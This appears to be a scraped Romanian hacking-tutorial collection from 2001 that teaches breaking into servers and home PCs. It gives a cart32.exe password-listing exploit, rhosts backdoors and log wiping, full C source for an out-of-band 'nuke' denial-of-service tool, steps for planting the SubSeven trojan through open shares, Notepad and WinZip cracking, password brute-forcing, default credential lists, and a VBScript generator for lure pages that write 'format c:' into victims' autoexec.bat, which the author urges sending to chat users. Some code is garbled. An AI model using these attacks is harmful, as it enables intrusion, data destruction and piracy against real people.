• Tidak ada hasil yang ditemukan

Autor:nebunu Data

N/A
N/A
Protected

Academic year: 2017

Membagikan "Autor:nebunu Data"

Copied!
12
0
0

Teks penuh

(1)

Autor:nebunu Data:7-02-2001

Subiect:Metode clasice de atac asupra oricarui server

Strangerea de informatii este vitala pentru a putea obtine acces pe un server. Voi da in continuare 10 metode de adunare a informatiilor despre server.com. 1)Pentru a afla IP-ul serverului tot ce trebuie sa faceti este sa tastati:

c:/>windows>tracert -j server.com

Acum este necesar sa vedem daca are optiunea "file and print share enabled",si daca sistemul de operare este linux sau windows nt.

c:/>windows>nbtstat -A ipadress

unde ipadress este adresa de IP gasita la pasul anterior.Comanda va lista numele tuturor userilor din memoria cache daca serverul este prost configurat. 2)Trebuie sa aflam serviciile care ruleaza pe server:ftp,telnet,smtp,finger precum si vesiunea lor.c:/>windows>ftp server.com

Daca are serviciu ftp va aparea ceva de genul "connected to server running WUFTPD...".Am aflat versiunea de server ftp care ruleaza pe portul 23.

Deschidem browserul de web si introducem http://www.server.com/lalalalala.htm. Vom primi un raspuns de genul "file not found on this server.Server running apache.."Am aflat si versiunea serverului pe care sunt stocate paginile web. La fel procedam cu smtp pe portul 25.c:/>windows>telnet qmail.server.com 25 La fel vom primi un mesaj asemanator.

Cunoscand toate serviciile care ruleaza pe server si versiunea acestora putem foarte usor gasi un exploit pentru ele.

3)Scanam toate bugurile cunoscute in cgi-bin,cgi-win si scripts.

Cel mai bun program care face acest lucru este Cgifound.Spre exemplu un fraier mi-a trimis deunazi un link catre un server vulnerabil si anume www.server.com.Vulnerabilitea consta in programul cart32.exe care se gaseste in cgi-bin.exploitul este:

www.server.com/cgi-bin/cart32.exe/cart32clientlist

Parola poate fi orice cuvant si toate parolele userilor sunt listate.Este

un bug cunoscut pentru cart32.exe.Pentru a vedea insa versiunea de cart32 introduceti in browser:www.server.com/cgi-bin/cart32.exe

Foarte multe informatii despre vulnerabilitatile acestui program gasiti pe

www.packetstorm.securify.com tastand in motorul de cautare 'card32' sau 'card'. Este relativ usor sa afli parola unui server,asta o poate face orice kiddie script insa este mai greu sa nu lasi urme.Si mai greu este sa instalezi un backdoor pe server ca sa poti intra cand doresti.

4)Instalarea unui backdoor pe server se face in functie de sistemul de operare. Pentru Unix:

Toti userii care au acces la serer sunt pastrati in fisierul etc/rhosts. Dupa ce am patruns inauntru editam fisierul etc/rhosts in felul urmator: #ed etc/rhosts?somesite.com someuser*w*q

Sau mai simplu daca nu cunoasteti Unix este sa descarcati fisierul etc/rhosts si sa adaugati linia:somesite.com semeuser

Asta inseamna ca orice utilizator de pe site-ul somesite.com se poate conecta folosind comanda 'rlogin' si userul 'someuser'.Frumos,nu?Pentru NT:

Trebuie adaugat un cont in fisierul *.sam folosind programul 'net'.Mai multe amanunte gasiti pe packetstorm.securify.com tastand 'NT'.

Evident acest truc este detectabil de administratorul retelei dar temporar este bun pentru ca va ajuta sa obtineti acces la radacina.Spre exemplu sub NT luati fisierele *.sam si decriptati-le.Sub Unix rulati un script care confera drept de root(SuID shell).

Apoi dupa ce am obtinut toate parolele si informatiile dorite trebuie sa indepartam orice urma a 'vizitei' noastre pentru ca administratorul sa nu

se prinda si sa putem intra oricand.Urmele se sterg indepartand IP-ul nostru din fisierele '*.log'.Sub Unix fisierul etc/inetd.conf contine toate serviciile

care ruleaza pe server precum si setarile acestora.Ce s-ar intampla daca modificam temporar aceste setari? :)

5)O alta metoda cunoscuta de a obtine accesul pe un server este metoda sniffingului. Un sniffer este un program care monitorizeaza traficul pe retea si asculta pe

un anume port indicat de utilizator.Cand cineva vrea sa se conecteze la serverul de mail pentru a-si citi mesajele parola si userul sunt interceptate si trimise la persoana care are snifferul in functiune.Un sniffer foarte bun este Buttsniff. Il gasiti pe www.packetstorm.securify.com.Iata cum functioneaza:

c:/>buttsniff -l 0 fisier.dmp p fisier.foo

Sa analizam putin acesta comanda:fisier.dmp este fisierul care va contine datele capturate de sniffer.Fisierul fisier.foo contine comenzi sau mai bine zis

(2)

---*.*.*.*122.1.1.4+25---

Asta inseamna ca este monitorizat serverul 122.1.1.4 pe portul 25 iar celelalte porturi sunt excluse.Un fisier.foo gol inseamna ca vreti sa colectti toate datele care vin/pleaca de la server.Mai multe instructiuni gasiti in fisierul

readme.txt.

6)O alta metoda de a obtine acces este metoda numita 'ftp bounch attack' Sa explic foarte pe scurt aceasta metoda:

Un server ftp A nu permite acces anonim decat unui server ftp B considerat de incredere,probabil din aceeasi retea.Serverul ftp B are un cont 'guest' activat.Se poate patrunde in A prin B folosind un script cu comenzi ftp ase-

manator celui de mai jos:quo "USER annonymous"quo "PASS gogo@lala.com"quo "pasv" ...Mai multe informatii pe astalavista.

7)Odata patrunsi intr-un server ftp trebuie sa stim adresa exacta a radacinii, de obicei serverul este instalat pe o ale virtuala.Serverul www.ipswitch.com are aceasta vulnerabilitate:www.ipswitch.com/_vti_pvt/shtml

si primim drept raspuns calea exacta si reala a serverului.Acum devine banal: ftp server.comuser:ftppassword:guest

dir ---sa vedem la ce avem acces,poate avem acces la cgi-bin-- cd --calea aflata inainte--(c:/inet/root...)put program.exequit

8)O alta vulnerabilitate este comanda PUT.Daca serverul este configurat prost: c:/>windows/telnet server.com 80PUT /scripts/script_ostil.asp HTTP/1.0

--corpul scriptului--/n/n/n

Dupa aceea il executam din browser:www.server.com/script/script_ostil.asp Portul poate sa nu fie 80 ci 8080 sau 8000 depinde de situatie.Trebuie intai sa vedem unde ruleaza pagini web.

9)O alta metoda,de data asta pentru profesionisti este urmarirea datagramelor sau a pachetelor de date care "intra in server".O mare companie a fost atacata in felul acesta cu ajutorul comenzii "SYN".Nu am timp sa dau detalii,poate intr-un alt tutorial,cititi articolele de pe astalavista,tastati 'tcp'.

10) Un program de nuke care intrerupe conexiunea la Internet,care exemplifica conceptul de dos attack.Ideea este ca daemonul care ruleaza pe un anumit port nu poate face fata la cereri repetate.Programul este facut in Borland C++. Compilati-l cu borland c++ ,cu alt compilator nu cred ca merge:nuke.cpp ---

#include <conio.h> #include <stdio.h>

#include <winsock.h>struct {

int port; char *targetIP;

int NumOfAttact, BufSize;} parm;void Pause(void) {

cprintf ("Apasati orice tasta pentru a renunta..."); getch();

wVersionRequested = MAKEWORD(1, 1);

err = WSAStartup(wVersionRequested, &wsaData); if (err != 0) return err;

if ( LOBYTE( wsaData.wVersion ) != 1 || HIBYTE( wsaData.wVersion ) != 1 ) { WSACleanup(); return -1;

} return 0;}void ParseIP(char* des, char *theIP){ unsigned int val; char i; for (i = 0; i < 4; i++) { if (*theIP != '\0') { val = 0;

while (*theIP != '\0' && *theIP != '.') { val *= 10; val += *theIP - '0'; theIP++; } des[i]= (char)val; if (*theIP != '\0') theIP++; } }}

void ParseParm(int argc, char* argv[]){ char * value; for (int i=1; i<argc; i++){ if (argv[i][0]=='/'){

argv[i][1]= (char)toupper(argv[i][1]); value = &argv[i][2]; switch (argv[i][1]){ case 'P': parm.port = atoi(value); break; case 'T': parm.targetIP=value; break;

case 'N': parm.NumOfAttact = atoi(value); break; case 'S': parm.BufSize = atoi(value); break; } } }}

(3)

SOCKET theSocket; sockaddr theAddr;

cprintf ("folosire : Nuke [/Pport] [/Ttarget] [/Nnum] [/Ssize]\r\n" " port : portul tinta, folositi 139.\r\n"

" target: adresa iP \"a.b.c.d\".\r\n"

" num: numarul de atacuri, implicit 10.\r\n"

" size: numarul de biti in fiecare atac, implicit 1024.\r\n\n"); if (CheckWinsock()){ cprintf ("nu merge conexiunea!\n"); Pause(); return 1; }

theSocket= socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); if (theSocket==-1){ cprintf ("nu merge conexiunea!\r\n"); Pause(); WSACleanup(); return 2;

} cprintf ("folosim socket-ul: %d\r\n", theSocket); parm.port = 139; parm.targetIP= NULL;

parm.NumOfAttact = 10; parm.BufSize = 1024; ParseParm(_argc, _argv); if (parm.targetIP==NULL){ parm.targetIP = (char*) malloc(256);

cprintf ("Introduceti Ip-ul: "); scanf ("%s", parm.targetIP); cprintf ("\r\n"); } theAddr.sa_family = AF_INET;

theAddr.sa_data[0]= (char)(parm.port/256); theAddr.sa_data[1]= (char)(parm.port%6); ParseIP(&theAddr.sa_data[2], parm.targetIP;

cprintf ("conexiune la %s pe portul: %d\r\n", parm.targetIP, parm.port); errcode = connect (theSocket, &theAddr, sizeof(sockaddr)); if (errcode){ cprintf ("Eroare.\r\nVerificati daca portul este 'pazit' de un daemon.\r\n"); Pause(); WSACleanup(); return 1; } cprintf ("STATUS: Conectat!!\r\n"); tempbuf = (char*) malloc(parm.BufSize);

for (i=0; i<parm.BufSize; i++) tempbuf[i]=0; for (i=0; i<parm.NumOfAttact; i++){

errcode = send (theSocket, tempbuf, parm.BufSize, MSG_OOB); cprintf ("Atac: %d , trimis ", i); if (errcode==-1) cprintf ("eroare.\r\n"); else cprintf ("%d bytes.\r\n", errcode); } free (tempbuf);

closesocket (theSocket); WSACleanup(); cprintf ("gata.\r\n"); Pause(); }

Fratilor!.Computerul nu este o masina de scris.Cine crede acest lucru si este utilizator de windows 95/98 il rog sa apese acest link apasa aici pentru a fi pedepsit!.

Cum zic eu intotdeauna,sa trecem la treaba!

Toate programele mentionarte le gasiti folsind motorul de cautare in care tastati numele programului. Vom folosi niste programe de hack pe care le aveti in windows si nici nu stiti de ele.

Puteti lua IP-ul cuiva cu ajutorul comenzii dos c:/windows/tracert -j www.numeserver. Incercati cu c:/windows/tracert -j www.nebunu.home.ro pentru a afla ip-ul meu.

Comanda c:/windows/nbtstat -n va va lista toate numele de utilizator din calculatorul dvs iar c:/windows/nbtstat -n www.numeserver va face acelasi lucru cu www.numeserver sau cu IP-ul persoanei dorite cum ar fi c:/windows/nbtstat -n 193.148.458.934.

Sa trecem acum la niste smecherii pe care le puteti face pe chat-uri unde sunt toti fraierii. (rog pe Cristi si Edi sa nu se supere pe mine,ei nu fac parte din aceasta categorie.)

Presupunem ca un calculator are optiunea "file and print sharing" din optiunea "network" care se gaseste in "control panel" activata.

Pentru a scana gazdele vulnerabile folositi programul Legion sau Nbtscan.

Daca este asa atunci putem face ce vrem cu calculatorul acelui lamer.Voi intrati pe chat cu programul Mirc.Tastati "dns/nickname" pentru a-i la IP-ul apoi urmati succesiunea de comenzi: c:/windows/nbtstat -n IP {IP este adresa de ip a lamerului}

Dupa aceasta comanda aflati probabil si numele computerului acelui nefericit.Presupunem ca numele este nebunu(nu,nu incercati la mine,eu nu intru pe chat-uri -:)

Tastati "c:/windows/net use f:\\IP\nebunu" si aveti acces la discul f al fraierului!. Sa explicam aceasta comanda:

Programul net.exe se gaseste in directorul windows al utilizatorilor de windows 95. IP-adresa lui de ip.

f-poate sa fie si c: sau d: ,reprezinta discul la care dorim sa avem acces. nebunu-numele computerului pe care-l aflati cu "c:/winldows/nbtstat -n IP" Sa instalam acum un troian cum ar fi Subseven pe calculatorul lamerului.

Dupa ce dati comanda "c:/windows/net use f:\\IP\nebunu" copiati fisieul "server.exe" pe f: "copy server.exe f:" apoi il executati "f:/server.exe".

DISTRACTIE PLACUTA

(4)

un disc virtual x: pe care sa puneti troianul. "net use x:\\IP\tmp\parola_dorita/user:ntwak0 "net copy server.exe"

C-R-A-C-K-I-N-G --- N-O-T-E-P-A-D

Nu va deranjeaza atunci cand deschideti un fisier mai mare de 100k in notepad,si apare mesajul "the file is too large for notepad to open..."????.Haideti sa scapam de acest mesaj si sa intram direct in Wordpad cand ne confruntam cu o astfel de siuatie.

1) avem nevoie de programul de dezasamblare w32dasm,de programul Hiew 2) cunostinte minime de assembler

-dezasamblati programul in w32dasm

-activati optiunea "string reference" si cautati sirul "the file is too large..."

-veti gasi ceva de genul "string resource ID=00052" -selectati optiunea Function submeniul Import -cautati functia User32.messageboxA(responsabile de casetele de dialog in windows)

-dati dublu click pe ea si obtineti ceva de genul

call dword ptr [00407430] {chemarea procedurii de mesaj} cmp eax,0000006{compara registrul eax cu adresa procedurii}

jne 00402E19 {daca eax nu este egal cu 0000006 .atunci iese din program pentruca sunt doua optiuni la selectarea lui OK se deschide Wordpad iar altfel iese.

Celelalte instructiuni nu mai conteza

- -selectati cu mouse-ul intstructiunile call si jne si notati adresa lor de ofset -inchideti w32dasm

-deschideti Hiew "hiew notepad.exe" -selectati F4 optiunea decode

-F5 si scrieti 2161 {adresa primului numar de offset (gasit pentru cmp)} -F3 scrieti 404840484048

-F9 pentru a valida introducerea

-F5,scrieti numarul pentru jne care este 216A -F3,scrieti 404840484048

-F9 pentru a actualiza si Gata!!! Ce dracu' este 404840484048?

40-in hexazecimal inseamna "inc eax" adica adauga 1 48-inseamna "dec eax" adica scade 1

90 inseamna NOP adica instructiunea nula(nu face nimic)

Asi fi putut la saltul "jne" sa pun NOP dar unele programe nu accepta aceasta instructiune asa ca am preferat sa execute un ciclu de genul "inc eax"---" dec eax"(pun 1 si apoi iau 1).

C-R-A-C-K-I-N-G W-I-N-Z-I-P

-deschid winzip si unde mi se cere numarul de inregistrare introduc 66696669

-NU tatez Enter!!! Las winzip asa cum este si il deschid in w32dasm ca proces in executie -scanez in programul dezasamblat 66696669 in hexa

-ma duc la adresa indicata cum ar fi 00154:FA14569 -gasesc ceva de genul:

mov al,[edx] cmp al,[esi] jnz 00418956

Deci compara numarul meu fals din "al" cu numarul de inregistrare adevarat aflat in memorie in "esi".Treduie sa afisez continutul registrului esi pentru a afla numarul adevarat!!!!

DATA VIITOARE UN NOU TUTORIAL DE HACK

Ne vom ocupa in acest tutorial de conturile dial-up.

Cerinte: programul Fscan pe care-l puteti lua de pe packetstorm.securify.com Continut:

1)Strangerea de informatii(partea cea mai grea de fapt) 2)Atacul propriu zis.

(5)

1)Majoritatea firmelor distribuitoare de Internet de la noi din tara prezinta o mare vulnerabilitate,aceea de a asigna numele utilizatorului folosit pentru conexiunea la internet,unei adrese de mail.Spre exemplu ISP-ul meu este

firma ISP(doar un exemplu) iar userul meu folosit pentru conectare este "nebunu".Atunci adresa mea de mail este nebunu@ISP.ro sau nebunu@server.ISP.ro.Deci daca aflu parola de la mail aflu si parola folosita pentru dial-up.

Stiti cred din tutorialele anterioare ca serverul pe care se afla mesajele primite are portul 110 deschis.iar cel folosit la transmiterea mesajelor are portul 25 deschis.Pe noi ne intereseaza portul 110.Dar cum aflam care este

adresa serverului pe care se afla mesajele?Simplu.Intai aflam IP-ul providerului de internet,tastand: tracert -j www.ISP.ro

Presupunem ca ul gasit este 154.14.14.25.Pentru afla care este serverul de receptie a mesajelor scanam IP-urile pe o raza care sa incadreze ultimul numar al IP-ului providerului,in cazul nostru pentru portul 110.Dar nu strica sa stim daca are si portul 79 deschis....;).

fscan -vbp 79,110 154.14.14.1-254

Presupunem ca IP-ul gasit este 154.14.14.144.Ca se ne convingem ca intr-adevar este serverul cautat,lansam din Start/Run urmatoarea comanda:

telnet 154.14.14.144 110 Dupa ce ne conectam tastam user blahbla

si vom primi ceva de genul +OK apoi tastam pass blabla

si vom primi un mesaj de eroare.Ne-am convins ca acesta este serverul!. Daca cumva aveti un cont la firma respectiva puteti sa va conectati asa: telnet server_de primire 110

user userul_tau pass parola_ta

si iti poti citi mail-ul folosind telnetul.

2)Daca stim userul mai trebuie sa aflam parola pentru a intra in posesia contului.Pentru asta folosim un program de brute force(Brutus.Unsecure,WWWhack etc).Le gasiti folosind motorul de cautare.In general lungimea parolei trebuie sa depaseasca 5 caractere,asa ca nu merge cu optiunea "brute force".Construiti-va un dictionar de parole care sa corespunda unui alt dictionar care sa cuprinda userii.Intai incercati daca userul si parola nu sunt identice,am intalnit cazuri din astea.Ca sa aflati direct user-ul intrati pe un chat,si folositi optiunea "finger" a programului mIRC.

Posibilitatile sunt nesfarsite,incercati...:).

3)Evident ca tot ce tastam ramane stocat in registrii windowsului.Pentru a afla datele despre conexiune deschidem meniul Start optiunea Run si tastam Regedit.Datele despre conexiune se afla la

H_KEY_CURRENT_USER/REMOTE ACCESS/PROFILE/"numele conexiunii"

Puteti afla astel userul dar parola este in binar si poate fi convertita usor,o sa scriu curand un tutorial despre asta.

Din pacate acolo unde exista intelepti exista si nebuni,oameni care fac rau numai din placerea de a face,fara nici un interes material sau de alta natura.Categoria mentionata este mare,eu o sa mentionez numai un exemplu,un incident nefericit.Putin inainte de a scrie acest articol,mai precis cu o zi inainte,am folosit motorul de cautare de la www.top100.ro pentru a descarca un program.Dupa aspectul dubios al site-ului mi-am dat seama imediat ca am de-a face cu un virus,dar mi-am pus nadejdea in masurile de securitate excelente pe care le am impotriva oricarui tip de atac.Asa ca am descarcat programul si l-am rulat.Antivirusul nu a dat nici un semn de viata.Mi-am contnuat lucrul mai departe.Nimic.Poate m-am inselat,mi-am zis.Am inchis computerul si m-am culcat.A doua zi i-am dat drumul.Dezastru.Ecran negru.Hardul putea sa faca concurenta celui mai nenorocit tractor african.Am intrat pe Safe Mode.Acelasi lucru.Am intrat in binecuvantatul sistem de operare MSDOS,pe care nu il voi mai critica niciodata.Am vrut sa vad continutul fisierelor

(6)

shell=Explorer.exe gkgflllgg.exe

Am sters toata linia pana la semnul egal.Am cautat programul gkgfllgg.exe si l-am sters.Nici un rezultat.Dupa doua ore de investigatii si dupa ce mi-am epuizat toata gama de injuraturi am izolat toate fisierele infectate si le-am sters.Nimic.Nu puteam sa intru in Windows deci nu aveam acces la registrii.Am reinstalat Windowsul dar am pierdut 100MB de pe hard plus niste informatii pe care nu doream sa le pierd.De aceea vreau sa va dau cateva sfaturi foarte utile privind propria securitate pe Net.

1)Nu va incredeti in nici un antivirus indiferent de upgrade,zilnic apar peste 12000 virusi din ce in ce mai "duri'.

2)Nu descarcati nici un program de carding,hack,nuke,dial-up de pe site-urile romanesti prezente in top100.Nici nu merita sa vizionati acele site-uri care va promit orice fara nici un efort.Daca totusi o faceti,inspectati cu atentie site-ul.Daca nu mai contine link-uri la alte pagini,adrese de mail sau explicatii plauzibile,daca conditioneaza vizionarea lor de votul dvs in top100 plecati imediat.

3)Cei care promoveaza site-uri ilegale,pornografice,in care se gasesc numere de carti de credit si alte dracii ,si va ofera programe cu pretentia ca puteti rezolva orice problema cu ele se inseala iar dvs sunteti cei pacaliti. 4)Programele care pretind ca listeaza toate conturile celor conectati la internet numai introducand IP-ul serverului sunt virusi sau troieni.Exemple de astfel de programe virusate,incarate de mine din simpla curiozitate pentrua vedea pana unde merge magaria, prostia si lipsa de judecata a unora

sunt:Iris.exe,dial_up_sniffer.exe,infiltrator.exe.Aceste programe sunt gazduite de siteuri formate dintr-o singura pagina si care au foarte multe voturi in top100.Singura pagina in care am incredere prezenta in top100 se afla la www.ender2000.home.ro

Studiind comportamentul acestui virus,cat si a altora am ajuns la concluzia ca majoritatea acestor programe odata rulate creeaza din corpul lor alte fisiere in directorul Windows sau System iar apoi creeaza intrari in registrii.De aceea se impune o monitorizare atenta a modificarilor continutului unui director.Dupa acest incident m-am hotarat sa creez un astfel de program de monitorizare care sa ruleze atat sub Windows cat si sub Dos.Sper sa fie gata pana pe 14 ianuarie 2000 si sa fie pus la dispozitia dumneavoastra cu tot cu cod sursa.

Cand rulati un program si apare o caseta de dialog de genul "cannot find blabla.dll" sunt 90% sanse sa fie virus.Nu iesiti din windows,stergeti linia "shell" din "system.ini",sa ramana ceva de genul

"shell=Explorer.exe",stregeti toata linia "run" din fisierul "win.ini",sa ramana numai "run=",afisati continutul fisierului "autoexec.bat" si inspectati continutul apoi vedeti calea "c:/windows/start menu/programs/startup" si stregeti tot ce va pare suspect,adica ce nu ati avut inainte.Apoi tastati "regedit" si stregeti CLSID-urile

suspecte,o sa scriu un tutorial despre registrii cat de curand.

Un hacker adevarat nu distruge nimic atunci cand reuseste sa patrunda intr-o retea ci foloseste in interes propriu toate informatiile sustrase.Am intalnit lameri nenorociti care formateaza hardul computerului in care reusec sa patrunda cu ajutorul programului Legion sau a altor programe de acest gen.Asta denota lipsa de materie canusie,nu-si imagineaza ca pot sa tina computerul respectiv sub control timp indelungat si sa sustraga in timp toate informaiile.

Daca gasiti vreo explicatie pentru care cineva doreste sa distruga ceva fara nici un motiv trimiteti un email la adresa nebunu@home.ro .

Priviti codul sursa de mai jos.Salvati pagina, copiati codul intr-un fisier cu extensia htm,rulati pagina,apasati "yes",si vedeti cum se poate citi continutul unui fisier direct din browserul Web.Evident ca se pot face mult mai multe,se poate schimba continutul unui fisier,se pot infiltra troieni cu ajutorul comenzilor vbscript.

---incepe codul--- <html><head><title>titlu</title></head><body bgcolor="black">

<script language="javascript">

stats='toolbar=no,location=no,directories=no,status=no,menubar=no,maximize= no' stats+='scrollbars=no,resizable=no,width=335,height=80,top=190,left=227'

MsgBox = window.open ("","msgWindow",stats)

MsgBox.document.write("<title>Press YES to see the live demo! </title>") MsgBox.document.write ("<BODY bgColor='#c0c0c0'>")

MsgBox.document.write ("<font color='black' size=5>Are you sure you want to see the demo?</font>")

(7)

<script language="vbscript"> dim f,a

set fso=createobject("scripting.filesystemobject") set f=fso.opentextfile("c:\autoexec.bat")

a=f.readall msgbox a </script>

</body></html>

---sfarsit--- Secventa:

set fso=CreateObject("scripting.filesystemobject") set fisier=CreateTextfile("c:\fisier.txt")

fisier.writeline "o linie scrisa in fisier" fisier.close

creeaza un fisier text in care apare textul "o linie scrisa in fisier".Acesta este principiul infiltrarii troienilor.Restul invatati singuri.

Email nebunu@home.ro

Programul AntiLame.vbs a fost creat de mine special ca o metoda de lupta impotriva chaturilor si a lamerilor de acolo.Programul creeaza o pagina web care contine un fisier de comenzi asemanatoare celor din

autoexec.bat.Odata rulata,acesta pagina,afiseaza o caseta de dialog cu un mesaj atragator destinat sa acopere mesajul implicit de avertizare a pericolului.Daca utilizatorul apasa "No" scriptul nu are efect,dar majoritatea lamerilor vor apasa "Yes" :).Acum voi da cateva detalii despre metoda de utilizare a programului. 1)creati un fisier text care sa contina comenzi Dos.Iata un exemplu:

@echo off

PATH c:/windows;c:/windows/command; format c:/q/autotest/u

2)Presupunand ca fisierul anterior se numeste fisier.txt,introduceti calea catre el cand programul cere acest lucru.Spre exemplu daca fisierul se afla in directorul "my documents",introduceti calea urmatoare c:/my documents/fisier.txt

3)Programul va crea pagina cu extensia *.htm.Pentru a vedea daca este compatibila cu browserul dvs rulati-o iar la mesajul "are you sure you want to see..." apasati "No" pentru a opri scriptul.Daca cumva apasati "Yes" autoexec.bat-ul dvs se schimba si trebuie sa-l stergeti.Dar voi apasati "No" pentru a nu avea probleme.

4)Arhivati pagina in format *.zip si trimiteti-o lamerului prin e-mail.Trebuie neaparat sa arhivati pagina pentru ca online pagina nu va rula.

Programul a fost scris in vbscript pentru a putea vedea sursa acestuia si exemplifica conceptul infiltrarii troienilor cu ajutorul paginilor web.Dezavantajul este ca programul AntiLame ruleaza numai sub

Windows95/98.

Programul poate fi luat de aici impreuna cu fisierul info.dat.Cele doua fisiere trebuie sa fie in acelasi director altfel programul nu va rula.Daca programul v-i se pare interesant poate votati pentru mine in top100.:)

Astept cu nerabdare comentariile dvs la nebunu@home.ro .Sfatul meu este sa trimiteti pagina creata prin DCC lamerilor de pe chat-uri.Nu uitati sa fie arhivata!!!

dim fisier,linie,fisier2,troian,a,fisier3,g

mesaj = "Acest script va crea o pagina web care modifica autoexec.bat-ul lamerului" titlu = "Vizitati www.nebunu.home.ro Email:nebunu@home.ro"

Call nebunu()

set fso=createobject("scripting.filesystemobject") if fso.fileexists("info.dat")<>true then

msgbox "Fisierul info.dat nu exista! Reinstalati-l in director.",0,"Nebunu" wscript.quit

(8)

a=inputbox("Dati calea catre fisierul de comenzi pe care doriti sa-l introduceti in autoexec.bat-ul lamerului.Fisierul trebuie sa fie in format text si nu trebuie sa fie mai mare de 64K! :")

if (a="") then wscript.quit end if

set fisier=fso.Opentextfile(a)

set fisier2=fso.createtextfile("c:\my documents\oferta.htm") set fisier3=fso.opentextfile("info.dat")

g=fisier3.readline

fisier2.write "<html><head><title>Animation program</title></head><body bgcolor='black'>" fisier2.writeline "<script language="&g&"javascript"&g&">"

fisier2.writeline"stats='toolbar=no,location=no,directories=no,status=no,menubar=no,maximize=no'"<BR>fi sier2.writeline"stats+='scrollbars=no,resizable=no,width=335,height=80,top=190,left=227'"

fisier2.writeline "MsgBox = window.open ("&g&""&g&","&g&"msgWindow"&g&",stats)"

fisier2.writeline "MsgBox.document.write("&g&"<title>Press YES to download free porn movies ! </title>"&g&")"

fisier2.writeline "MsgBox.document.write ("&g&"<BODY bgColor='#c0c0c0'>"&g&")"

fisier2.writeline "MsgBox.document.write ("&g&"<font color='black' size=5>Are you sure you want to see the sexyest girls from the whole planet?</font>"&g&")"

fisier2.writeline "</SCRIPT>"

fisier2.writeline "<script language="&g&"vbscript"&g&">"

fisier2.writeline "set fso=createobject("&g&"scripting.filesystemobject"&g&")" fisier2.writeline "set f=fso.createtextfile("&g&"c:/autoexec.bat"&g&")"

do while fisier.atendofstream<>true linie=fisier.readline

troian="f.writeline "&g&"" &linie&""&g&" " fisier2.writeline troian

loop

fisier2.writeline "f.close" fisier2.writeline "</script>"

fisier2.writeline "</body></html>" fisier.close

fisier2.close fisier3.close

msgbox "Pagina a fost creata.Stiti ce aveti de facut cu ea :)",0,"Nebunu" Sub nebunu()

Dim buton

buton = MsgBox(mesaj, _ vbOKCancel + vbInformation, _ titlu )

If buton = vbCancel Then WScript.Quit

End If End Sub

1)comenzi unix 2)fisiere speciale 3)suid shell 4)fisiere script

Prima oara cand am pus mana pe o carte despre UNIX mi-am zis ca nu o sa fiu capabil niciodata sa invat acest sistem de operare deoarece este prea dificil. In realitate este extraordinar de simplu si usor de utilizat oarecum asemanator cu MSDos-ul.Aceasta impresie de moment mi-a fost creata de stilul in care a fost scrisa cartea,un stil greoi cu multe explicatii suplimentare care in loc sa

te faca sa intelegi,mai rau te incurca,stil specific autorilor cu pretentii de geniu,si cu mintea creatza datorita propriilor aberatii.

Eu o sa intru direct in subiect si o sa prezint comenzile principale.Evident ca sa le puteti folosi trebuie sa aveti un cont la nethet.net.V-am explicat deja cum poate fi obtinut,nu mai insist.(cititi capitolul telnet).Semnul $ reprezinta promptul dvs la nether.net cum ar fi /> in Dos.

Principalele comenzi unix: cat

(9)

cat fisier ls

listeaza continutul unui director(toate fisierele) ls-

acelasi lucru,numai cal isteaza si drepturile de acces. cp

copiaza continutul unui fisier in alt fisier cp fisier1 fisier2

ed

editeaza un fisier ed fisier

?

a "de la append" prima linie a doua linie {control z} ?

w ? q

dupa ce dati comanda "ed fisier" apare semnul ?,tastati a de la append scrieti fisierul propriuzis,tastati control+z,iar va aparea ?

tastati "w" ca sa acordati drept de scriere,apoi "q" de la quit. cd

schimba directorul curent cd /etc

directorul curent va fi etc. cd /

diretorul curent va fi directorul radacina. pwd

rezultatul este directorul curent pwd

/usr/bin

finger,rwho,who

ofera informatii despre domeniul respectiv sau despre userul respectiv finger nebunu@home.ro

login name:nebunu ...

finger home.ro

name:home.ro in real life?? connection refused

asta inseamna ca unele severe nu permit acest lucru si bine fac :) mail

trimite un mesaj la adresa specificata mail nebunu@home.ro

Salut,te-am votat in top 100 {control+c}

whereis

listeaza calea catre un anumit program sau fisier whereis ping

chmod

shimba starea fisierului chmod r+w fisier

fisierul acorda drept de citire si scriere chmod +x fisier

(10)

termina aplicatia pe serverul gazda. Nu a fost chiar asa de complicat ,nu?

2)Cel mai important fisier pentru hackeri este /etc/passwd fisierul cu parola. Am mai vorbit despre el asa ca nu mai insist.

De obicei utilizatorii obisnuiti nu au acces la el,dar la nether.net am gasit

o vulnerabilitate.Cu toate ca parolele nu pot fi decriptate deoarece sunt "shadow" pot afla toti userii de pe server,in total vreo 10000!Cati dintre ei au aceiasi

parola ca si username?Foarte multi dar nu ma intereseaza... cat etc/passwd

va aparea pe ecran o lista care se va derula cateva minute!

Stiti deja cum sa cititi un fisier passwd,si stiti cum pot fi aflati userii.

Alt fisier important este etc/services care contine serviciile care ruleaza pe server. Mai poate fi mentionat directorul conf si fisierul etc/inetd.conf care contin

setarile de baza.

Gata cu aceasta parte..Puteti invata restul si singuri. 3)

Un shell este un program care se incarca in momentul conectarii iar apoi se executa.Sa luam secventa:

c:/>windows>telnet nether.net 23 ..tastati dublu enter...

..apar informatii despre server... login:username-ul dvs

password:parola dvs bash $

In acest moment shell-ul este activ(bash).Semnul "$" inseamna ca nu detineti drept de acces la root.Daca ati avea acest drept promptul ar fi "#"

Scopul unui hacker este root access.Cum poate fi obtinut?Faceti shell-ul dvs sa joace rolul de root!In acest moment aveti controlul total asupra serverului. Puteti edita fisierul etc/passwd adaugand inca o intrare,cu care puteti intra, puteti schimba parola...:).Acest lucru poate fi obtinut ruland pe server un program SUID.Informatii despre suid aflati de pe astalavista.box.sk, eu nu am timp sa scriu astfel de programe,oricum ele pot fi gasite peste tot.

4)Fisierele script in unix seamana cu fisierele *.bat din dos.Un mic exemplu:

$bin/bash 'numele shell-ului este bash' echo "cum te cheama:"

read nume

echo "hello" $nume

Astfel de fisiere pot fi gasite la kilogram pe astalavista.Problema e timpul... Voi incheia dand alt exemplu de vulnerabilitate al serverelor ftp.

ftp

open ftp.server.com 21 username:guest

password:ftp you are logged in ftp>put fis.txt

ftp>quo "cp etc/passwd fis.txt" ftp>quo "exec ls -l"

ftp>quit

unele servere permit executia de comenzi,am intalnit asa ceva recent iar altele cand intalnesc o astfel de secventa te deconecteaza imediat.In continuare cateva parole implicite pentru diferite servicii.Merge la serverele mai vechi.

(11)

--- ---

root root - nu prea tine figura ;) sys sys / system / bin

bin sys / bin

mountfsys mountfsys adm adm

uucp uucp nuucp anon anon anon user user games games install install demo demo

umountfsys umountfsys sync sync

admin admin guest guest daemon daemon

Subiect: motoare de cautare

